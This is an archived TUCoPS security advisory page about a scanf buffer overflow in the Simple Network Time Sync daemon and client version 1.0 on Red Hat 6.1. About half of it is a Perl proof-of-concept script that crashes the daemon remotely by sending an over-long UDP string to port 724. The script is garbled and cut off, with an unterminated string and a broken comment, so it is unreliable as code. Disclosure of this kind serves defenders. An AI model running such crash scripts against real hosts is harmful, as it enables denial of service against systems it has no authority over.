Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Linux :: Apps N-Z :: snts.htm

Simple Network Time Sync overflow, possibly exploitable

    Simple Network Time Sync


    Simple Network Time Sync


    'logistix' found following.  He noticed an uncommon scanf overflow
    in the  Simple Network  Time Sync  daemon and  client version 1.0,
    tested on Redhat 6.1.  He  hasn't looked into this fully yet,  but
    it looks  as tho  it could  be root  comprimising as  it sits on a
    priveledged  udp  port  and  seems  to  coredump,  but  looks like
    it only gives  you 50 chars  to run code  with.  He  included some
    perl here which will crash it remotely by sending it a string over
    50 chars.

    #!/usr/bin/perl -w
    # Usage: ./kill_sntsd <hostname>
    use Socket;
    send_packet(); # Needs to send 2 packets to kill the client
    and the server daemons
    sub send_packet {
    $proto = getprotobyname('udp');
    $localaddr = gethostbyname("localhost") || die "error: $!
    $iaddr = gethostbyname($ARGV[0]) || die "$!\n";
    $sin = sockaddr_in(724, $iaddr);
    $paddr = sockaddr_in(53, $localaddr);
    socket(SH, PF_INET, SOCK_DGRAM, $proto);
    bind(SH, $paddr);
    connect(SH, $sin) || die "$!\n";
    # A string longer than 50 characters...
    SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix


    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH